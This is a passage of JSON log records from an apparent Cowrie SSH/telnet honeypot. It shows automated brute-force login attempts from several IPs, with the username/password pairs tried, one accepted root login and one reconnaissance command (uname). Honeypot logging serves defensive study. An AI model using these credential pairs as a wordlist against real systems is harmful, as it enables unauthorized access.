"aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:31:41.526241Z","src_ip":"185.93.89.7","session":"140fe048c841"}
{"eventid":"cowrie.login.failed","username":"index","password":"777777","message":"login attempt [index/777777] failed","sensor":"my-vps","timestamp":"2025-08-28T09:31:41.565477Z","src_ip":"185.93.89.7","session":"140fe048c841"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-28T09:31:41.930705Z","src_ip":"51.79.164.132","session":"abbbd7268bc0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:31:42.725957Z","src_ip":"185.93.89.7","session":"140fe048c841"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:31:43.123491Z","src_ip":"51.79.164.132","session":"abbbd7268bc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10580,"dst_ip":"1.2.3.4","dst_port":23,"session":"46a03e8e09f8","protocol":"telnet","message":"New connection: 212.227.235.229:10580 (1.2.3.4:23) [session: 46a03e8e09f8]","sensor":"my-vps","timestamp":"2025-08-28T09:31:47.586006Z"}
{"eventid":"cowrie.session.closed","duration":12.471527099609375,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:32:00.057459Z","src_ip":"212.227.235.229","session":"46a03e8e09f8"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":50814,"dst_ip":"1.2.3.4","dst_port":22,"session":"c098dd8b1318","protocol":"ssh","message":"New connection: 185.93.89.7:50814 (1.2.3.4:22) [session: c098dd8b1318]","sensor":"my-vps","timestamp":"2025-08-28T09:32:05.434473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:32:05.435648Z","src_ip":"185.93.89.7","session":"c098dd8b1318"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:32:05.454589Z","src_ip":"185.93.89.7","session":"c098dd8b1318"}
{"eventid":"cowrie.login.failed","username":"index","password":"987654","message":"login attempt [index/987654] failed","sensor":"my-vps","timestamp":"2025-08-28T09:32:05.513328Z","src_ip":"185.93.89.7","session":"c098dd8b1318"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":37760,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3a24b7aba12","protocol":"ssh","message":"New connection: 51.79.164.132:37760 (1.2.3.4:22) [session: c3a24b7aba12]","sensor":"my-vps","timestamp":"2025-08-28T09:32:05.579499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:32:05.677022Z","src_ip":"51.79.164.132","session":"c3a24b7aba12"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:32:06.196912Z","src_ip":"51.79.164.132","session":"c3a24b7aba12"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:32:06.532928Z","src_ip":"185.93.89.7","session":"c098dd8b1318"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-28T09:32:07.907366Z","src_ip":"51.79.164.132","session":"c3a24b7aba12"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:32:09.390324Z","src_ip":"51.79.164.132","session":"c3a24b7aba12"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":34794,"dst_ip":"1.2.3.4","dst_port":22,"session":"50bdc4a1e374","protocol":"ssh","message":"New connection: 185.93.89.7:34794 (1.2.3.4:22) [session: 50bdc4a1e374]","sensor":"my-vps","timestamp":"2025-08-28T09:32:30.378753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:32:30.379853Z","src_ip":"185.93.89.7","session":"50bdc4a1e374"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:32:30.404406Z","src_ip":"185.93.89.7","session":"50bdc4a1e374"}
{"eventid":"cowrie.login.failed","username":"index","password":"12341234","message":"login attempt [index/12341234] failed","sensor":"my-vps","timestamp":"2025-08-28T09:32:30.463824Z","src_ip":"185.93.89.7","session":"50bdc4a1e374"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:32:31.484655Z","src_ip":"185.93.89.7","session":"50bdc4a1e374"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":52532,"dst_ip":"1.2.3.4","dst_port":22,"session":"c071624ea8ff","protocol":"ssh","message":"New connection: 51.79.164.132:52532 (1.2.3.4:22) [session: c071624ea8ff]","sensor":"my-vps","timestamp":"2025-08-28T09:32:31.972770Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:32:32.116889Z","src_ip":"51.79.164.132","session":"c071624ea8ff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:32:32.638446Z","src_ip":"51.79.164.132","session":"c071624ea8ff"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab123","message":"login attempt [gitlab/gitlab123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:32:34.079891Z","src_ip":"51.79.164.132","session":"c071624ea8ff"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:32:35.620777Z","src_ip":"51.79.164.132","session":"c071624ea8ff"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:32:38.348001Z","src_ip":"212.227.125.160","session":"d2ca51dc84cf"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":43438,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bf58d3e9c81","protocol":"ssh","message":"New connection: 185.93.89.7:43438 (1.2.3.4:22) [session: 6bf58d3e9c81]","sensor":"my-vps","timestamp":"2025-08-28T09:32:55.928235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:32:55.929299Z","src_ip":"185.93.89.7","session":"6bf58d3e9c81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62960,"dst_ip":"1.2.3.4","dst_port":22,"session":"2971a4d09d50","protocol":"ssh","message":"New connection: 212.227.235.229:62960 (1.2.3.4:22) [session: 2971a4d09d50]","sensor":"my-vps","timestamp":"2025-08-28T09:32:55.942273Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:32:55.943057Z","src_ip":"212.227.235.229","session":"2971a4d09d50"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:32:55.946990Z","src_ip":"185.93.89.7","session":"6bf58d3e9c81"}
{"eventid":"cowrie.login.failed","username":"index","password":"qwer1234","message":"login attempt [index/qwer1234] failed","sensor":"my-vps","timestamp":"2025-08-28T09:32:56.002009Z","src_ip":"185.93.89.7","session":"6bf58d3e9c81"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:32:56.712524Z","src_ip":"212.227.235.229","session":"2971a4d09d50"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:32:57.028453Z","src_ip":"185.93.89.7","session":"6bf58d3e9c81"}
{"eventid":"cowrie.login.failed","username":"user","password":"satan","message":"login attempt [user/satan] failed","sensor":"my-vps","timestamp":"2025-08-28T09:32:57.492375Z","src_ip":"212.227.235.229","session":"2971a4d09d50"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":55954,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c90b78178c5","protocol":"ssh","message":"New connection: 51.79.164.132:55954 (1.2.3.4:22) [session: 9c90b78178c5]","sensor":"my-vps","timestamp":"2025-08-28T09:32:57.981285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:32:58.301544Z","src_ip":"51.79.164.132","session":"9c90b78178c5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:32:58.449937Z","src_ip":"51.79.164.132","session":"9c90b78178c5"}
{"eventid":"cowrie.login.failed","username":"user","password":"hudson","message":"login attempt [user/hudson] failed","sensor":"my-vps","timestamp":"2025-08-28T09:32:58.668503Z","src_ip":"212.227.235.229","session":"2971a4d09d50"}
{"eventid":"cowrie.login.failed","username":"user","password":"commando","message":"login attempt [user/commando] failed","sensor":"my-vps","timestamp":"2025-08-28T09:32:59.839321Z","src_ip":"212.227.235.229","session":"2971a4d09d50"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qaz@Wsx","message":"login attempt [root/!Qaz@Wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:33:00.298969Z","src_ip":"51.79.164.132","session":"9c90b78178c5"}
{"eventid":"cowrie.login.failed","username":"user","password":"bones","message":"login attempt [user/bones] failed","sensor":"my-vps","timestamp":"2025-08-28T09:33:01.016789Z","src_ip":"212.227.235.229","session":"2971a4d09d50"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:33:01.521830Z","src_ip":"51.79.164.132","session":"9c90b78178c5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:33:01.522542Z","src_ip":"51.79.164.132","session":"9c90b78178c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:33:01.857323Z","src_ip":"51.79.164.132","session":"9c90b78178c5"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:33:01.859167Z","src_ip":"51.79.164.132","session":"9c90b78178c5"}
{"eventid":"cowrie.login.failed","username":"user","password":"bangkok","message":"login attempt [user/bangkok] failed","sensor":"my-vps","timestamp":"2025-08-28T09:33:02.191814Z","src_ip":"212.227.235.229","session":"2971a4d09d50"}
{"eventid":"cowrie.session.closed","duration":"10.9","message":"Connection lost after 10.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:33:06.814910Z","src_ip":"212.227.235.229","session":"2971a4d09d50"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":59172,"dst_ip":"1.2.3.4","dst_port":22,"session":"9825f37e8a7e","protocol":"ssh","message":"New connection: 185.93.89.7:59172 (1.2.3.4:22) [session: 9825f37e8a7e]","sensor":"my-vps","timestamp":"2025-08-28T09:33:19.967327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:33:20.001169Z","src_ip":"185.93.89.7","session":"9825f37e8a7e"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:33:20.001996Z","src_ip":"185.93.89.7","session":"9825f37e8a7e"}
{"eventid":"cowrie.login.failed","username":"index","password":"696969","message":"login attempt [index/696969] failed","sensor":"my-vps","timestamp":"2025-08-28T09:33:20.114463Z","src_ip":"185.93.89.7","session":"9825f37e8a7e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:33:21.228741Z","src_ip":"185.93.89.7","session":"9825f37e8a7e"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":49444,"dst_ip":"1.2.3.4","dst_port":22,"session":"fef0aaaa0c16","protocol":"ssh","message":"New connection: 51.79.164.132:49444 (1.2.3.4:22) [session: fef0aaaa0c16]","sensor":"my-vps","timestamp":"2025-08-28T09:33:24.295106Z"}
